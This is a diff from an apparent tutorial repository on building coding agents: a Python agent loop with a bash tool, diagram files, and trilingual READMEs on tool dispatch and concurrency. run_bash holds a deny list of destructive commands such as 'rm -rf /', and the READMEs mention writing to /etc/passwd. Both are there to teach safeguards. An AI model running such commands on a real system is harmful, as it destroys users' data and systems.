don't explain." + +# ── Tool definition: just bash ──────────────────────────── +TOOLS = [{ + "name": "bash", + "description": "Run a shell command.", + "input_schema": { + "type": "object", + "properties": {"command": {"type": "string"}}, + "required": ["command"], + }, +}] + + +# ── Tool execution ──────────────────────────────────────── +def run_bash(command: str) -> str: + dangerous = ["rm -rf /", "sudo", "shutdown", "reboot", "> /dev/"] + if any(d in command for d in dangerous): + return "Error: Dangerous command blocked" + try: + r = subprocess.run(command, shell=True, cwd=os.getcwd(), + capture_output=True, text=True, timeout=120) + out = (r.stdout + r.stderr).strip() + return out[:50000] if out else "(no output)" + except subprocess.TimeoutExpired: + return "Error: Timeout (120s)" + except (FileNotFoundError, OSError) as e: + return f"Error: {e}" + + +# ── The core pattern: a while loop that calls tools until the model stops ── +def agent_loop(messages: list): + while True: + response = client.messages.create( + model=MODEL, system=SYSTEM, messages=messages, + tools=TOOLS, max_tokens=8000, + ) + + # Append assistant turn + messages.append({"role": "assistant", "content": response.content}) + + # If the model didn't call a tool, we're done + if response.stop_reason != "tool_use": + return + + # Execute each tool call, collect results + results = [] + for block in response.content: + if block.type == "tool_use": + print(f"\033[33m$ {block.input['command']}\033[0m") + output = run_bash(block.input["command"]) + print(output[:200]) + results.append({ + "type": "tool_result", + "tool_use_id": block.id, + "content": output, + }) + + # Feed tool results back, loop continues + messages.append({"role": "user", "content": results}) + + +# ── Entry point ────────────────────────────────────────── +if __name__ == "__main__": + print("s01: Agent Loop") + print("输入问题,回车发送。输入 q 退出。\n") + + history = [] + while True: + try: + query = input("\033[36ms01 >> \033[0m") + except (EOFError, KeyboardInterrupt): + break + if query.strip().lower() in ("q", "exit", ""): + break + history.append({"role": "user", "content": query}) + agent_loop(history) + # Print the model's final text response + response_content = history[-1]["content"] + if isinstance(response_content, list): + for block in response_content: + if getattr(block, "type", None) == "text": + print(block.text) + print() diff --git a/s01_agent_loop/images/agent-loop.en.svg b/s01_agent_loop/images/agent-loop.en.svg new file mode 100644 index 000000000..541ab3f96 --- /dev/null +++ b/s01_agent_loop/images/agent-loop.en.svg @@ -0,0 +1,86 @@ + + + + + + + + + + + + + + + + + + + + + + + + Agent Loop — A while Loop Drives the Entire Agent + + + + User Query + "Create hello.py for me" + + + + + + + messages[] + Accumulated message list + + + + + + + LLM + + Model reads message history + Decision: Need a tool? + Returns stop_reason signal + + + + + + + stop_reason + == "tool_use"? + + + + No + + + + Return Result + Loop Ends + + + + Yes + + + + Execute Tool Call + run_bash(command) + + + + Append tool_result to messages + + + + Core: a + while True + loop. Model calls tool → Execute → Feed back → Ask again. No tool call → Stop. + All subsequent chapters layer mechanisms on top of this loop. + diff --git a/s01_agent_loop/images/agent-loop.ja.svg b/s01_agent_loop/images/agent-loop.ja.svg new file mode 100644 index 000000000..ee726e697 --- /dev/null +++ b/s01_agent_loop/images/agent-loop.ja.svg @@ -0,0 +1,86 @@ + + + + + + + + + + + + + + + + + + + + + + + + Agent Loop — 一つの while ループで Agent 全体を駆動 + + + + ユーザーの質問 + "hello.py を作って" + + + + + + + messages[] + 累積メッセージリスト + + + + + + + 大規模言語モデル (LLM) + + モデルがメッセージ履歴を読む + 判断:ツールが必要か? + stop_reason シグナルを返す + + + + + + + stop_reason + == "tool_use"? + + + + No + + + + 結果を返す + ループ終了 + + + + Yes + + + + ツール呼び出しを実行 + run_bash(command) + + + + tool_result を messages に追加 + + + + 核心:一つの + while True + ループ。ツール呼出 → 実行 → 結果を戻す → 再度問う。ツールなし → 停止。 + 以降の全章がこのループの上に仕組みを積み重ねる。 + diff --git a/s01_agent_loop/images/agent-loop.svg b/s01_agent_loop/images/agent-loop.svg new file mode 100644 index 000000000..87c6b5008 --- /dev/null +++ b/s01_agent_loop/images/agent-loop.svg @@ -0,0 +1,86 @@ + + + + + + + + + + + + + + + + + + + + + + + + Agent Loop — 一个 while 循环驱动整个 Agent + + + + 用户提问 + "帮我创建 hello.py" + + + + + + + messages[] + 累积式消息列表 + + + + + + + 大模型 (LLM) + + 模型阅读消息历史 + 判断:需要工具吗? + 返回 stop_reason 信号 + + + + + + + stop_reason + == "tool_use"? + + + + + + + + 返回结果 + 循环结束 + + + + + + + + 执行工具调用 + run_bash(command) + + + + 追加 tool_result 到 messages + + + + 核心:一个 + while True + 循环。模型调工具 → 执行 → 喂回 → 再问。不调工具就停。 + 后续所有章节都在这个循环上叠加机制。 + diff --git a/s02_tool_use/README.en.md b/s02_tool_use/README.en.md new file mode 100644 index 000000000..8c441e546 --- /dev/null +++ b/s02_tool_use/README.en.md @@ -0,0 +1,256 @@ +# s02: Tool Use — Add a Tool, Add Just One Line + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → `s02` → [s03](../s03_permission/) → s04 → ... → s19 +> *"Add a tool, add just one handler"* — The loop stays the same. Register the new tool in the dispatch map and you're done. +> +> **Harness Layer**: Tool Dispatch — Expanding the model's reach. + +--- + +## Only Bash — One Swiss Army Knife + +The s01 Agent has only one tool: bash. To read a file, `cat`; to write, `echo "..." > file.py`; to edit, `sed`. + +This makes the model suffer — it thinks "read this file" but has to translate that into `cat path/to/file`. The translation itself burns tokens and is error-prone. + +**You wouldn't use a single Swiss Army knife for everything either.** + +--- + +## Bird's Eye View: Tool Dispatch — Loop Unchanged, Just Add Mapping + +![Tool Dispatch](images/tool-dispatch.en.svg) + +The s01 loop is fully preserved (LLM call, stop_reason check, message append — not a single word changed). The only change is in that one line of tool execution: `run_bash()` is replaced with `TOOL_HANDLERS[block.name]()` dispatch lookup. + +Adding a tool to the Agent requires just two things: + +1. **Define the tool**: Add one entry to the `TOOLS` array +2. **Register the handler**: Add one mapping in the `TOOL_HANDLERS` dict + +The loop itself — not a single line changed. + +--- + +## From 1 Tool to 5 Tools + +s01 had only bash: + +```python +TOOLS = [{"name": "bash", ...}] + +def run_bash(command): ... +``` + +s02 expands to 5 tools, each independently defined: + +```python +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", ...}, + {"name": "read_file", "description": "Read file contents.", ...}, + {"name": "write_file", "description": "Write content to file.", ...}, + {"name": "edit_file", "description": "Replace text in file once.", ...}, + {"name": "glob", "description": "Find files by pattern.", ...}, +] +``` + +Each tool has its own implementation function: + +```python +def run_read(path, limit=None): + lines = safe_path(path).read_text().splitlines() + if limit: + lines = lines[:limit] + return "\n".join(lines) + +def run_write(path, content): + safe_path(path).write_text(content) + return f"Wrote {len(content)} bytes to {path}" + +def run_edit(path, old_text, new_text): + text = safe_path(path).read_text() + if old_text not in text: + return "Error: text not found" + safe_path(path).write_text(text.replace(old_text, new_text, 1)) + return f"Edited {path}" + +def run_glob(pattern): + import glob as g + return "\n".join(g.glob(pattern, root_dir=WORKDIR)) +``` + +--- + +## Tool Dispatch: One Line Changed in the Loop + +```python +TOOL_HANDLERS = { + "bash": run_bash, + "read_file": run_read, + "write_file": run_write, + "edit_file": run_edit, + "glob": run_glob, +} + +# Only one line changed in the loop — from hardcoded run_bash to dispatch lookup: +for block in response.content: + if block.type == "tool_use": + handler = TOOL_HANDLERS[block.name] # lookup + output = handler(**block.input) # call + results.append(...) +``` + +Adding a tool = one entry in `TOOLS` array + one line in `TOOL_HANDLERS` dict. The loop stays the same. + +--- + +## What If the Model Calls Multiple Tools at Once? + +![Concurrency Comparison](images/concurrency-comparison.en.svg) + +The model often returns multiple tool calls at once — "read a.py and b.py, then list all .py files". + +These three operations (read a, read b, list files) are independent and can be **executed in parallel**. But if the model first writes then reads the same file, they must be **executed sequentially** — read must wait for write to finish. + +The teaching version uses a partition approach: + +```python +def partition_tool_calls(blocks): + """Split into two groups: concurrent-safe and must-be-sequential.""" + concurrent, sequential = [], [] + for block in blocks: + if block.type != "tool_use": + continue + # read and glob are read-only, can run concurrently + if block.name in ("read_file", "glob"): + concurrent.append(block) + else: + sequential.append(block) + return concurrent, sequential + +# Execution: first run potentially mutating tools sequentially, then read-only tools concurrently +for block in sequential: + output = execute_tool(block) + results.append(...) +for block in concurrent: + output = execute_tool(block) + results.append(...) +``` + +**Key correction**: The teaching version initially placed bash in the sequential group (because it "might modify the filesystem"). But bash's actual behavior depends on the specific command — `ls -la` is read-only and could safely run alongside reads; `rm file.txt` genuinely needs to be queued. CC's `isConcurrencySafe()` judges by specific input, not by tool name. The teaching version uses a simplified partition (hardcoded by tool name), which is simpler code but loses this granularity. + +This isn't perfect concurrency (no thread pool in the teaching version), but it conveys the core concept: **some tools can run simultaneously, some can't**. + +--- + +## Quick Reference + +| Concept | One-Liner | +|---------|-----------| +| TOOL_HANDLERS | Tool name → handler function dict. Add a tool = add one mapping line | +| Tool Definition | JSON schema telling the model "what I can do" | +| Partition | Separate concurrency-safe tools from those that must run sequentially | +| Loop Unchanged | s01's `while True` loop — not a single line changed | + +--- + +## Changes from s01 + +| Component | Before (s01) | After (s02) | +|-----------|-------------|-------------| +| Tool count | 1 (bash) | 5 (+read, write, edit, glob) | +| Tool execution | Hardcoded `run_bash()` | TOOL_HANDLERS dispatch lookup | +| Concurrency | None | partition_tool_calls | +| Path safety | None | safe_path validation | +| Loop | `while True` + `stop_reason` | Identical to s01 | + +--- + +## Try It + +```sh +cd learn-claude-code +python s02_tool_use/code.py +``` + +Try these prompts: + +1. `Read the file README.md and tell me what this project is about` +2. `Create a file called test.py that prints "hello", then read it back` +3. `Find all Python files in this directory` +4. `Read both README.md and requirements.txt, then create a summary file` + +What to watch for: When does the model call just one tool, and when does it call multiple at once? Are multiple tools executed sequentially or in parallel? + +--- + +## What's Next + +The Agent now has 5 tools and can do anything. But can it `rm -rf /`? Can it write to `/etc/passwd`? + +→ s03 Permission: Add a gate before tool execution — is this operation safe? Does it need user approval? + +
+Dive into CC Source Code + +> The following is based on a complete analysis of CC source code `Tool.ts`, `toolOrchestration.ts`, `toolExecution.ts`, and `StreamingToolExecutor.ts`. + +### 1. Tool Definition Approach + +**Teaching version**: `TOOLS` array + `TOOL_HANDLERS` dict. Definition and implementation are separate. +**CC**: Each tool is an independent object created by `buildTool()`, containing schema, validation, permissions, and execution. `getAllBaseTools()` aggregates all tools. + +The teaching version's separation is clearer for teaching — readers immediately see "add a tool = two definitions". + +### 2. Concurrency Safety: isConcurrencySafe() vs isReadOnly() + +This is the teaching version's biggest simplification. CC uses `isConcurrencySafe(input)` rather than `isReadOnly()` to determine concurrency: + +| | isReadOnly | isConcurrencySafe | +|---|---|---| +| FileRead | true | true | +| Glob | true | true | +| Bash `ls` | true | **true** ← key difference | +| Bash `rm` | false | false | +| TaskCreate | false | **true** ← modifies state but can be concurrent (introduced in s12) | + +CC's Bash tool's `isConcurrencySafe` equals `isReadOnly` — read-only commands can be concurrent, write commands cannot. TaskCreate modifies task files, but each writes a different file, so it can be concurrent. The teaching version hardcodes groups by tool name, losing Bash's input-dependency but preserving the core concept. + +### 3. Partition Algorithm + +CC's `partitionToolCalls()` (`toolOrchestration.ts:91`) doesn't split into two groups — it batches tool calls **by consecutive blocks**: + +``` +[read A, read B, glob *.py, bash "rm x", read C] + → batch1(concurrent): [read A, read B, glob *.py] + → batch2(serial): [bash "rm x"] + → batch3(concurrent): [read C] +``` + +Consecutive concurrency-safe calls are grouped into the same batch for concurrent execution. When a non-concurrency-safe call is encountered, a new batch starts for serial execution. Batches are strictly sequential. + +### 4. Validation Pipeline + +Each tool call in CC goes through a strict 5-step validation (`toolExecution.ts:599`): + +1. **Zod schema validation** (teaching version uses JSON Schema): parameter type/structure check +2. **Tool-level validateInput()**: parameter value validation (e.g., is the path within the working directory) +3. **PreToolUse hooks** (covered in s04): hooks can return messages, modify input, or block execution +4. **Permission check** (core topic of s03): canUseTool + checkPermissions → allow/deny/ask +5. **Execute tool.call()** + +The teaching version omits Zod (uses JSON Schema), omits validateInput (uses safety functions), but preserves the permission check and hook concepts. + +### 5. Streaming Tool Execution + +CC's `StreamingToolExecutor` (`StreamingToolExecutor.ts`) starts tools while the model is still generating — no waiting for the model to finish. `read_file` might complete while the model is still outputting "Let me analyze". The teaching version doesn't implement this, consistent with s01's goal — conceptual clarity, not peak performance. + +### 6. Tool Result Persistence + +Each tool has a `maxResultSizeChars` field. Results exceeding this threshold are persisted to disk, and the model sees a preview + file path. FileRead is special — set to `Infinity`, preventing file read output from being persisted again. Specifically, if FileRead's result exceeds the threshold and gets persisted, the model's next read of that persisted file would trigger another persistence → infinite loop (read file → persist → re-read → re-persist → ...). + +
+ + diff --git a/s02_tool_use/README.ja.md b/s02_tool_use/README.ja.md new file mode 100644 index 000000000..0853cc811 --- /dev/null +++ b/s02_tool_use/README.ja.md @@ -0,0 +1,256 @@ +# s02: Tool Use — ツール一つ追加、一行追加だけ + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → `s02` → [s03](../s03_permission/) → s04 → ... → s19 +> *"ツールを一つ追加、ハンドラを一つ追加"* — ループはそのまま。新しいツールをディスパッチマップに登録するだけ。 +> +> **Harness レイヤー**: ツールディスパッチ — モデルが触れる範囲を拡張。 + +--- + +## bash 一つだけのスイスアーミーナイフ + +s01 の Agent には bash 一つのツールしかない。ファイルを読むには `cat`、書くには `echo "..." > file.py`、編集するには `sed`。 + +これではモデルにとって苦痛だ — 「このファイルを読みたい」と考えていても、`cat path/to/file` に翻訳しなければならない。翻訳そのものがトークンを消費し、エラーも起きやすい。 + +**あなただって、スイスアーミーナイフ一本で全てを済ませないだろう。** + +--- + +## 鳥瞰図:ツールディスパッチ — ループ不変、マッピングを追加するだけ + +![Tool Dispatch](images/tool-dispatch.ja.svg) + +s01 のループは完全に保持される(LLM 呼び出し、stop_reason 判定、メッセージ追加 — 一文字も変更なし)。唯一の変更点はツール実行の 1 行:`run_bash()` が `TOOL_HANDLERS[block.name]()` の検索ディスパッチに置き換わる。 + +Agent にツールを追加するには、たった二つ: + +1. **ツールを定義**:`TOOLS` 配列に一条を追加 +2. **ハンドラを登録**:`TOOL_HANDLERS` 辞書に一つのマッピングを追加 + +ループ自体 — 一行も変更しない。 + +--- + +## 1 つのツールから 5 つのツールへ + +s01 には bash だけだった: + +```python +TOOLS = [{"name": "bash", ...}] + +def run_bash(command): ... +``` + +s02 では 5 つに増え、各ツールは独立して定義される: + +```python +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", ...}, + {"name": "read_file", "description": "Read file contents.", ...}, + {"name": "write_file", "description": "Write content to file.", ...}, + {"name": "edit_file", "description": "Replace text in file once.", ...}, + {"name": "glob", "description": "Find files by pattern.", ...}, +] +``` + +各ツールには専用の実装関数がある: + +```python +def run_read(path, limit=None): + lines = safe_path(path).read_text().splitlines() + if limit: + lines = lines[:limit] + return "\n".join(lines) + +def run_write(path, content): + safe_path(path).write_text(content) + return f"Wrote {len(content)} bytes to {path}" + +def run_edit(path, old_text, new_text): + text = safe_path(path).read_text() + if old_text not in text: + return "Error: text not found" + safe_path(path).write_text(text.replace(old_text, new_text, 1)) + return f"Edited {path}" + +def run_glob(pattern): + import glob as g + return "\n".join(g.glob(pattern, root_dir=WORKDIR)) +``` + +--- + +## ツールディスパッチ:ループ内は一行だけ変更 + +```python +TOOL_HANDLERS = { + "bash": run_bash, + "read_file": run_read, + "write_file": run_write, + "edit_file": run_edit, + "glob": run_glob, +} + +# ループ内で変更されたのは一行だけ — ハードコードの run_bash から検索ディスパッチへ: +for block in response.content: + if block.type == "tool_use": + handler = TOOL_HANDLERS[block.name] # 検索 + output = handler(**block.input) # 呼び出し + results.append(...) +``` + +ツールの追加 = `TOOLS` 配列に一条 + `TOOL_HANDLERS` 辞書に一行。ループは変わらない。 + +--- + +## モデルが複数のツールを同時に呼び出したら? + +![並発比較](images/concurrency-comparison.ja.svg) + +モデルはよく一度に複数のツール呼び出しを返す — 「a.py と b.py を読んで、全 .py ファイルを列挙して」。 + +この 3 つの操作(a を読む、b を読む、ファイル一覧)は互いに依存しないため、**並列実行**できる。しかし、モデルが同じファイルに先に書き込んでから読み取る場合、**順次実行**しなければならない — read は write の完了を待つ必要がある。 + +教育版はパーティション方式を使う: + +```python +def partition_tool_calls(blocks): + """二つのグループに分割:並列安全なものと順次実行必須のもの。""" + concurrent, sequential = [], [] + for block in blocks: + if block.type != "tool_use": + continue + # read と glob は読み取り専用、並列可能 + if block.name in ("read_file", "glob"): + concurrent.append(block) + else: + sequential.append(block) + return concurrent, sequential + +# 実行:先にファイル変更の可能性があるものを順次実行、次に読み取り専用を並列実行 +for block in sequential: + output = execute_tool(block) + results.append(...) +for block in concurrent: + output = execute_tool(block) + results.append(...) +``` + +**重要な修正点**:教育版では当初 bash を sequential グループに入れていた(「ファイルシステムを変更する可能性がある」ため)。しかし bash の実際の動作はコマンド次第 — `ls -la` は読み取り専用で read と並列実行可能;`rm file.txt` こそ順次が必要。CC の `isConcurrencySafe()` はツール名ではなく具体的な入力で判断する。教育版はツール名でハードコードした簡略版を使い、コードはシンプルだがこの粒度を犠牲にしている。 + +完璧な並列処理ではない(教育版にはスレッドプールがない)が、核心概念を伝えるには十分:**一部のツールは同時に実行でき、一部はできない**。 + +--- + +## 速查 + +| 概念 | 一言で | +|------|--------| +| TOOL_HANDLERS | ツール名 → ハンドラ関数の辞書。ツール追加 = マッピング一行追加 | +| ツール定義 | モデルに「何ができるか」を伝える JSON schema | +| パーティション | 並列安全なツールと順次実行必須のツールを分離 | +| ループ不変 | s01 の `while True` ループ — 一行も変更なし | + +--- + +## s01 からの変更 + +| コンポーネント | 変更前 (s01) | 変更後 (s02) | +|--------------|-------------|-------------| +| ツール数 | 1 (bash) | 5 (+read, write, edit, glob) | +| ツール実行 | ハードコード `run_bash()` | TOOL_HANDLERS 検索ディスパッチ | +| 並列処理 | なし | partition_tool_calls | +| パス安全性 | なし | safe_path 検証 | +| ループ | `while True` + `stop_reason` | s01 と完全に同一 | + +--- + +## 試してみよう + +```sh +cd learn-claude-code +python s02_tool_use/code.py +``` + +以下のプロンプトを試してみよう: + +1. `Read the file README.md and tell me what this project is about` +2. `Create a file called test.py that prints "hello", then read it back` +3. `Find all Python files in this directory` +4. `Read both README.md and requirements.txt, then create a summary file` + +観察のポイント:モデルがツールを一つだけ呼び出すときと、複数同時に呼び出すときの違い。複数ツールは順次実行か並列実行か? + +--- + +## 次へ + +Agent は 5 つのツールを持ち、何でもできる。しかし `rm -rf /` を実行できるか? `/etc/passwd` に書き込めるか? + +→ s03 Permission:ツール実行前にゲートを追加 — この操作は安全か? ユーザーの承認が必要か? + +
+CC ソースコードを深掘り + +> 以下は CC ソースコード `Tool.ts`、`toolOrchestration.ts`、`toolExecution.ts`、`StreamingToolExecutor.ts` の完全分析に基づく。 + +### 一、ツール定義方式 + +**教育版**:`TOOLS` 配列 + `TOOL_HANDLERS` 辞書。定義と実装が分離。 +**CC**:各ツールは `buildTool()` で作成された独立オブジェクトで、schema、バリデーション、権限、実行を含む。`getAllBaseTools()` が全ツールを集約。 + +教育版の分離方式は教学に適している — 読者は「ツール追加 = 二つの定義」と一目で分かる。 + +### 二、並列安全性:isConcurrencySafe() vs isReadOnly() + +教育版の最大の簡略化。CC は `isReadOnly()` ではなく `isConcurrencySafe(input)` で並列可否を判断する: + +| | isReadOnly | isConcurrencySafe | +|---|---|---| +| FileRead | true | true | +| Glob | true | true | +| Bash `ls` | true | **true** ← 重要な違い | +| Bash `rm` | false | false | +| TaskCreate | false | **true** ← 状態変更するが並列可能(s12 で紹介) | + +CC の Bash ツールの `isConcurrencySafe` は `isReadOnly` と同じ — 読み取り専用コマンドは並列可能、書き込みコマンドは不可。TaskCreate はタスクファイルを変更するが、毎回異なるファイルに書き込むため並列可能。教育版はツール名でハードコードしたグループ分けを行い、Bash の入力依存性を失うが核心概念は保持している。 + +### 三、パーティションアルゴリズム + +CC の `partitionToolCalls()`(`toolOrchestration.ts:91`)は二つのグループに分けるのではなく、ツール呼び出しを**連続ブロックごとにバッチ化**する: + +``` +[read A, read B, glob *.py, bash "rm x", read C] + → batch1(並列): [read A, read B, glob *.py] + → batch2(直列): [bash "rm x"] + → batch3(並列): [read C] +``` + +連続する並列安全な呼び出しを同じバッチにまとめて並列実行。非並列安全な呼び出しに遭遇すると新しいバッチを開始して直列実行。バッチ間は厳密に順次。 + +### 四、バリデーションパイプライン + +CC の各ツール呼び出しは厳格な 5 段階のバリデーションを経る(`toolExecution.ts:599`): + +1. **Zod schema バリデーション**(教育版は JSON Schema で代替):パラメータの型/構造チェック +2. **ツールレベル validateInput()**:パラメータ値の検証(例:パスが作業ディレクトリ内か) +3. **PreToolUse フック**(s04 で詳解):フックはメッセージの返却、入力の変更、実行のブロックが可能 +4. **権限チェック**(s03 の核心):canUseTool + checkPermissions → allow/deny/ask +5. **tool.call() の実行** + +教育版は Zod を省略(JSON Schema を使用)、validateInput を省略(安全関数を使用)、権限チェックとフック概念は保持。 + +### 五、ストリーミングツール実行 + +CC の `StreamingToolExecutor`(`StreamingToolExecutor.ts`)はモデルがまだ生成中にツールを起動する — モデルの完了を待たない。`read_file` はモデルが「分析します」と出力中に完了するかもしれない。教育版はこれを実装しない。s01 と同じ目標 — 概念の明確さ、極限のパフォーマンスではない。 + +### 六、ツール結果の永続化 + +各ツールには `maxResultSizeChars` フィールドがある。この閾値を超える結果はディスクに保存され、モデルにはプレビュー + ファイルパスが表示される。FileRead は特殊 — `Infinity` に設定され、ファイル読み出し結果の再永続化を防ぐ。具体的には、FileRead の結果が閾値を超えて永続化されると、モデルがその永続化ファイルを次に読むときにまた永続化がトリガーされ → 無限ループ(ファイル読む → 永続化 → 再読み → 再永続化 → ...)になる。 + +
+ + diff --git a/s02_tool_use/README.md b/s02_tool_use/README.md new file mode 100644 index 000000000..9ec667850 --- /dev/null +++ b/s02_tool_use/README.md @@ -0,0 +1,256 @@ +# s02: Tool Use — 多加一个工具,只加一行 + +[中文](README.md) · [English](README.en.md) · [日本語](README.ja.md) + +s01 → `s02` → [s03](../s03_permission/) → s04 → ... → s19 +> *"加一个工具, 只加一个 handler"* — 循环不用动, 新工具注册进 dispatch map 就行。 +> +> **Harness 层**: 工具分发 — 扩展模型能触达的边界。 + +--- + +## 只有 bash 一把瑞士军刀 + +s01 的 Agent 只有一个 bash 工具。读文件要 `cat`,写文件要 `echo "..." > file.py`,改文件要 `sed`。 + +这让模型很痛苦——它脑子里想的是"读这个文件",手上却要翻译成 `cat path/to/file`。翻译过程本身消耗 token,而且容易出错。 + +**你也不会只用一把瑞士军刀干所有活。** + +--- + +## 鸟瞰:工具分发——循环不变,只加映射 + +![Tool Dispatch](images/tool-dispatch.svg) + +s01 的循环完全保留(LLM 调用、stop_reason 判断、消息追加——一字不改)。唯一的变动在工具执行那 1 行:`run_bash()` 替换为 `TOOL_HANDLERS[block.name]()` 查表分发。 + +给 Agent 加一个工具只需要做两件事: + +1. **定义工具**:在 `TOOLS` 数组里加一条描述 +2. **注册处理函数**:在 `TOOL_HANDLERS` 字典里加一个映射 + +循环本身一行都不改。 + +--- + +## 从 1 个工具到 5 个工具 + +s01 只有一个 bash: + +```python +TOOLS = [{"name": "bash", ...}] + +def run_bash(command): ... +``` + +s02 加到 5 个,每个工具都是独立定义: + +```python +TOOLS = [ + {"name": "bash", "description": "Run a shell command.", ...}, + {"name": "read_file", "description": "Read file contents.", ...}, + {"name": "write_file", "description": "Write content to file.", ...}, + {"name": "edit_file", "description": "Replace text in file once.", ...}, + {"name": "glob", "description": "Find files by pattern.", ...}, +] +``` + +每个工具有自己的实现函数: + +```python +def run_read(path, limit=None): + lines = safe_path(path).read_text().splitlines() + if limit: + lines = lines[:limit] + return "\n".join(lines) + +def run_write(path, content): + safe_path(path).write_text(content) + return f"Wrote {len(content)} bytes to {path}" + +def run_edit(path, old_text, new_text): + text = safe_path(path).read_text() + if old_text not in text: + return "Error: text not found" + safe_path(path).write_text(text.replace(old_text, new_text, 1)) + return f"Edited {path}" + +def run_glob(pattern): + import glob as g + return "\n".join(g.glob(pattern, root_dir=WORKDIR)) +``` + +--- + +## 工具分发:一行不改循环 + +```python +TOOL_HANDLERS = { + "bash": run_bash, + "read_file": run_read, + "write_file": run_write, + "edit_file": run_edit, + "glob": run_glob, +} + +# 循环里只改了一行——从硬编码 run_bash 变成查表: +for block in response.content: + if block.type == "tool_use": + handler = TOOL_HANDLERS[block.name] # 查表 + output = handler(**block.input) # 调用 + results.append(...) +``` + +加一个工具 = 在 `TOOLS` 数组加一条 + 在 `TOOL_HANDLERS` 字典加一行。循环不变。 + +--- + +## 模型一次调了多个工具怎么办? + +![并发对比](images/concurrency-comparison.svg) + +模型经常一次返回多个工具调用——"读一下 a.py 和 b.py,然后列出所有 .py 文件"。 + +这三个操作(读 a、读 b、列文件)互不依赖,可以**并行执行**。但如果模型先 write 再 read 同一个文件,就必须**顺序执行**——read 必须等 write 完成。 + +教学版用分区逻辑: + +```python +def partition_tool_calls(blocks): + """分成两组:可以并发的,和必须顺序执行的。""" + concurrent, sequential = [], [] + for block in blocks: + if block.type != "tool_use": + continue + # read 和 glob 是只读的,可以并发 + if block.name in ("read_file", "glob"): + concurrent.append(block) + else: + sequential.append(block) + return concurrent, sequential + +# 执行:先顺序跑可能改文件系统的,再并发跑只读的 +for block in sequential: + output = execute_tool(block) + results.append(...) +for block in concurrent: + output = execute_tool(block) + results.append(...) +``` + +**关键修正**:教学版最初把 bash 放在 sequential 组(因为它"可能改文件系统")。但 bash 的实际行为取决于具体命令——`ls -la` 是只读的,完全可以和 read 并发跑;`rm file.txt` 才需要排队。CC 的 `isConcurrencySafe()` 是按具体输入判断的,不是按工具名。教学版用了简化版的分区(按工具名硬编码),代码更简单但丢了这个粒度。 + +这不是完美的并发(教学版没有线程池),但传达了核心概念:**某些工具可以同时跑,某些不行**。 + +--- + +## 速查 + +| 概念 | 一句话 | +|------|--------| +| TOOL_HANDLERS | 工具名 → 处理函数的字典。加工具 = 加一行映射 | +| 工具定义 | 告诉模型"我能做什么"的 JSON schema | +| 分区 | 把并发安全的工具和必须顺序执行的分开 | +| 循环不变 | s01 的 `while True` 循环一行都没改 | + +--- + +## 相对 s01 的变更 + +| 组件 | 之前 (s01) | 之后 (s02) | +|------|-----------|-----------| +| 工具数量 | 1 (bash) | 5 (+read, write, edit, glob) | +| 工具执行 | 硬编码 `run_bash()` | TOOL_HANDLERS 查表分发 | +| 并发 | 无 | partition_tool_calls 分区 | +| 路径安全 | 无 | safe_path 校验 | +| 循环 | `while True` + `stop_reason` | 与 s01 完全一致 | + +--- + +## 试一下 + +```sh +cd learn-claude-code +python s02_tool_use/code.py +``` + +试试这些 prompt: + +1. `Read the file README.md and tell me what this project is about` +2. `Create a file called test.py that prints "hello", then read it back` +3. `Find all Python files in this directory` +4. `Read both README.md and requirements.txt, then create a summary file` + +观察重点:模型什么时候只调一个工具,什么时候一次调多个?多个工具是顺序执行还是并行? + +--- + +## 接下来 + +现在 Agent 手里有 5 个工具,什么都能做。但它能不能 `rm -rf /`?能不能往 `/etc/passwd` 写东西? + +s03 Permission → 在工具执行之前加一道门:这个操作安全吗?需要用户批准吗? + +
+深入 CC 源码 + +> 以下基于 CC 源码 `Tool.ts`、`toolOrchestration.ts`、`toolExecution.ts`、`StreamingToolExecutor.ts` 的完整分析。 + +### 一、工具定义方式 + +**教学版**:`TOOLS` 数组 + `TOOL_HANDLERS` 字典。定义和实现分开。 +**CC**:每个工具是 `buildTool()` 创建的独立对象,包含 schema、验证、权限、执行。`getAllBaseTools()` 汇总所有工具。 + +教学版的分离方式对教学更清晰——读者一眼看到"加一个工具 = 两条定义"。 + +### 二、并发安全判断:isConcurrencySafe() vs isReadOnly() + +这是教学版最大的简化。CC 用 `isConcurrencySafe(input)` 而不是 `isReadOnly()` 来判断能否并发: + +| | isReadOnly | isConcurrencySafe | +|---|---|---| +| FileRead | true | true | +| Glob | true | true | +| Bash `ls` | true | **true** ← 关键差异 | +| Bash `rm` | false | false | +| TaskCreate | false | **true** ← 改状态但可并发(TaskCreate 在 s12 介绍) | + +CC 的 Bash tool 的 `isConcurrencySafe` 等于 `isReadOnly`——只读命令可并发,写命令不可。TaskCreate 虽然改了任务文件,但每次都写不同的文件,所以可以并发。教学版用工具名硬编码分组,丢了 Bash 的输入相关性,但保留了核心概念。 + +### 三、分区算法 + +CC 的 `partitionToolCalls()`(`toolOrchestration.ts:91`)不是分两组,而是把工具调用**按连续块分批**: + +``` +[read A, read B, glob *.py, bash "rm x", read C] + → batch1(并发): [read A, read B, glob *.py] + → batch2(串行): [bash "rm x"] + → batch3(并发): [read C] +``` + +并发安全的连续块编入同一个 batch 并发执行,遇到非并发安全的就开新 batch 串行执行。batch 之间严格顺序。 + +### 四、验证管线 + +CC 的每个工具调用经过严格的 5 步验证(`toolExecution.ts:599`): + +1. **Zod schema 验证**(教学版用 JSON Schema 替代):参数类型/结构检查 +2. **工具级 validateInput()**:参数值验证(如路径是否在工作区内) +3. **PreToolUse hooks**(s04 详细介绍):钩子可以返回消息、修改输入、阻止执行 +4. **权限检查**(s03 的核心内容):canUseTool + checkPermissions → allow/deny/ask +5. **执行 tool.call()** + +教学版省略了 Zod(用 JSON Schema)、省略了 validateInput(用安全函数)、保留了权限检查和钩子概念。 + +### 五、流式工具执行 + +CC 的 `StreamingToolExecutor`(`StreamingToolExecutor.ts`)让工具在模型还在生成时就启动——不等模型说完。`read_file` 可能在模型还在输出"我来分析"的时候就跑完了。教学版不实现这个,目标和 s01 一致——概念清晰,不追求性能极致。 + +### 六、工具结果持久化 + +每个工具有一个 `maxResultSizeChars` 字段。结果超过这个值就落盘,模型看到的是预览 + 文件路径。FileRead 特殊——设为 `Infinity`,防止读文件的输出又被当成文件落盘。具体来说,如果 FileRead 的结果超过阈值被落盘,模型下次读那个落盘文件时又会触发落盘 → 无限循环(读文件 → 落盘 → 再读 → 再落盘 → ...)。 + +
